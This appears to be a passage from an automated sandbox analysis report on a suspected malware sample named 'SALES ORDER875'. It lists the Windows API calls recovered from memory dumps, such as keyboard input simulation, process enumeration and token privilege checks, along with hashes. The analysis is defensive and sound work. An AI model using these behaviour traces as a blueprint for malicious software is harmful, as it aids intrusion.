                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 83f4c09a4913e44168706f82bb78f32ff7470d5443ef56fa5417b77183373af6
                                                                                                                                                                                    • Instruction ID: 5e1150de32a61f308b68ac8686840fe66b5dc3332dfa050b9f346fd359c5ad34
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83f4c09a4913e44168706f82bb78f32ff7470d5443ef56fa5417b77183373af6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C410A75A00704AFD7269F79CC41BAABBA9EF85714F10462EF245DFA82DBB199018780
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003F5783
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 003F57A9
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003F57CE
                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003F57FA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                    • Opcode ID: bf5520fa3d18107680962eaf4c729c69b7291a5cf975597368860b742f07ac98
                                                                                                                                                                                    • Instruction ID: 0e7433c64029621c49a3a8ab6b038a920b2a37bdb75267d6f68130fb7ceb6e21
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf5520fa3d18107680962eaf4c729c69b7291a5cf975597368860b742f07ac98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06410C39600614DFCB12EF15C544A5DBBE2AF49720B19C498E95A5F762CB34FD40CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,003A6D71,00000000,00000000,003A82D9,?,003A82D9,?,00000001,003A6D71,?,00000001,003A82D9,003A82D9), ref: 003BD910
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003BD999
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003BD9AB
                                                                                                                                                                                    • __freea.LIBCMT ref: 003BD9B4
                                                                                                                                                                                      • Part of subcall function 003B3820: RtlAllocateHeap.NTDLL(00000000,?,00451444,?,0039FDF5,?,?,0038A976,00000010,00451440,003813FC,?,003813C6,?,00381129), ref: 003B3852
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                    • Opcode ID: 89b23fe7f10395f043b3433e7eff3684a1a1ad269644137fa428fcaf9ff78a9f
                                                                                                                                                                                    • Instruction ID: 78c1490b369dd1cce8fd8316278d21e245ae9497bf694436fe47f85d04161a8f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89b23fe7f10395f043b3433e7eff3684a1a1ad269644137fa428fcaf9ff78a9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31BC72A0021AABDF269F64DC81EEF7BA5EB41314F064168FD04DB290EB35CD54CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00415352
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00415375
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00415382
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004153A8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3340791633-0
                                                                                                                                                                                    • Opcode ID: 5c01086153ae52e13560751d35b5b93ae19870fc3c743e1dc310c1260932a57a
                                                                                                                                                                                    • Instruction ID: 162fa8d8f85b5c2167e1217ea9ddb9fd16c68f76be8facf3dc605f163450dc13
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c01086153ae52e13560751d35b5b93ae19870fc3c743e1dc310c1260932a57a
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD31C634A95A0CEFEB349E14DC45BEA3765AB84390F544113FE20972E1C7B89DC0E74A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 003EABF1
                                                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 003EAC0D
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 003EAC74
                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 003EACC6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                    • Opcode ID: ecdc5952ec66f6c09d3a2e0562d316a81f1725d9a9f238a541f025f184f38aba
                                                                                                                                                                                    • Instruction ID: 880bf26749b74b8b1ce8d06882977ea000ecf864b1d7236b0e7aa695c5cd9462
                                                                                                                                                                                    • Opcode Fuzzy Hash: ecdc5952ec66f6c09d3a2e0562d316a81f1725d9a9f238a541f025f184f38aba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59314B70A44BB86FFF36CB668C047FE7BA5AB85310F28431AE485D61D0C374A9858793
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0041769A
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00417710
                                                                                                                                                                                    • PtInRect.USER32(?,?,00418B89), ref: 00417720
                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0041778C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                    • Opcode ID: eea9567a8156165c09909f0c9cf3478f84e067e43373fce69200f745763ca654
                                                                                                                                                                                    • Instruction ID: 76c404010dee514207390df65f34db7ca5f71e7c6abac65bdd41fa30ef77911d
                                                                                                                                                                                    • Opcode Fuzzy Hash: eea9567a8156165c09909f0c9cf3478f84e067e43373fce69200f745763ca654
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89417C746052149FCB01DF58C894EE9B7F5BB49314F1981AAE4249B3A1C738F981CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 004116EB
                                                                                                                                                                                      • Part of subcall function 003E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3A57
                                                                                                                                                                                      • Part of subcall function 003E3A3D: GetCurrentThreadId.KERNEL32 ref: 003E3A5E
                                                                                                                                                                                      • Part of subcall function 003E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E25B3), ref: 003E3A65
                                                                                                                                                                                    • GetCaretPos.USER32(?), ref: 004116FF
                                                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 0041174C
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00411752
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                                                    • Opcode ID: 78a85a9b8c402f9a83e3c9c1252f433e696a47d3d35bcf87dea583a6cfb7ff0d
                                                                                                                                                                                    • Instruction ID: 1dcaf0fae94b9fa3cc089a6327f6aa7d6f8f51a10a327b75025542f1b3a480f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a85a9b8c402f9a83e3c9c1252f433e696a47d3d35bcf87dea583a6cfb7ff0d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01315271D00249AFD701EFA9C885CEEB7F9EF48304B5080AAE515EB351D6359E45CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 003ED501
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 003ED50F
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 003ED52F
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003ED5DC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                    • Opcode ID: e1c599d7959901fbb46eda1dde9ba8cd62ccd3e543700a7456fc168569f99817
                                                                                                                                                                                    • Instruction ID: 6b7dfd090d429e4409d6aa7fc47e32e2f059eb8bb559ae6bb80cecb185cb12c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1c599d7959901fbb46eda1dde9ba8cd62ccd3e543700a7456fc168569f99817
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8318D71108341AFD302EF54C885ABFBBF8EF99354F14096DF5819A1E1EB719A48CB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00399BB2
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00419001
                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003D7711,?,?,?,?,?), ref: 00419016
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0041905E
                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003D7711,?,?,?), ref: 00419094
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                                                    • Opcode ID: bc6ed07bfe338f59a5cc0afaa1b3302c3d83001698398b48e37d17b9a5d413aa
                                                                                                                                                                                    • Instruction ID: 11a4f978a289faf6f96ef6aec065aab83eafe6c591385aac023be5f724ec42f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc6ed07bfe338f59a5cc0afaa1b3302c3d83001698398b48e37d17b9a5d413aa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D217C35600118EFDB25CF94CCA8FEA7FB9EB49361F04406AF9054B261C3399D90DB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0041CB68), ref: 003ED2FB
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003ED30A
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 003ED319
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0041CB68), ref: 003ED376
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                    • Opcode ID: 3383c8574e499b8486350a24059b941365b589ea1ec7a98620b90ea7d5c1a2ee
                                                                                                                                                                                    • Instruction ID: 928280bd4fe976e00961a3aa35b72c476d76e028f46c3ab51cb34639bbec7199
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3383c8574e499b8486350a24059b941365b589ea1ec7a98620b90ea7d5c1a2ee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5921B2785083519F8311EF29C8818AEB7E8EE56324F204B5EF499D72E1D731D945CB93
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E102A
                                                                                                                                                                                      • Part of subcall function 003E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E1036
                                                                                                                                                                                      • Part of subcall function 003E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1045
                                                                                                                                                                                      • Part of subcall function 003E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E104C
                                                                                                                                                                                      • Part of subcall function 003E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E1062
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003E15BE
                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 003E15E1
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E1617
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E161E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1592001646-0
                                                                                                                                                                                    • Opcode ID: 85b00fc9724873b1b785f016b3c95a559a9a5df8c8d514449b2e8c12dabdfcc4
                                                                                                                                                                                    • Instruction ID: 721e49ec7d7dbfb624422ecceea31f220a76007317eaea9b0645efa6b08bd140
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85b00fc9724873b1b785f016b3c95a559a9a5df8c8d514449b2e8c12dabdfcc4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521AC31E40218EFDF11DFA6C945BEEB7B8EF45354F098559E845AB281E730AE05CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041280A
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00412824
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00412832
                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00412840
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                                                    • Opcode ID: 4c258f649404a256822aee79be9bb83002e53c47b0e77b0d5bcd50934cc07688
                                                                                                                                                                                    • Instruction ID: ce717a498c46e19b865421dfee3de3e914eb1571350f61db36e80ae7700da6a0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c258f649404a256822aee79be9bb83002e53c47b0e77b0d5bcd50934cc07688
                                                                                                                                                                                    • Instruction Fuzzy Hash: B621C131204511AFD714AB24CD84FEABB95AF46328F148259F426CB6E2C7B9FC92C794
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,003E790A,?,000000FF,?,003E8754,00000000,?,0000001C,?,?), ref: 003E8D8C
                                                                                                                                                                                      • Part of subcall function 003E8D7D: lstrcpyW.KERNEL32(00000000,?,?,003E790A,?,000000FF,?,003E8754,00000000,?,0000001C,?,?,00000000), ref: 003E8DB2
                                                                                                                                                                                      • Part of subcall function 003E8D7D: lstrcmpiW.KERNEL32(00000000,?,003E790A,?,000000FF,?,003E8754,00000000,?,0000001C,?,?), ref: 003E8DE3
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,003E8754,00000000,?,0000001C,?,?,00000000), ref: 003E7923
                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,003E8754,00000000,?,0000001C,?,?,00000000), ref: 003E7949
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,003E8754,00000000,?,0000001C,?,?,00000000), ref: 003E7984
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                    • Opcode ID: 0e3cf481ce974edd2c7b113dc62ba0c7107921e6efee03f8d998101dcfd491b6
                                                                                                                                                                                    • Instruction ID: 262e4e21af944be3b919d237769b79f0e170af6c28228bccaefc2068d6aed771
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e3cf481ce974edd2c7b113dc62ba0c7107921e6efee03f8d998101dcfd491b6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3211293A200391AFCB169F35CC45E7B77A9FF45350B10812AF806CB2A5EB319801C755
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00417D0B
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00417D2A
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00417D42
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003FB7AD,00000000), ref: 00417D6B
                                                                                                                                                                                      • Part of subcall function 00399BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00399BB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
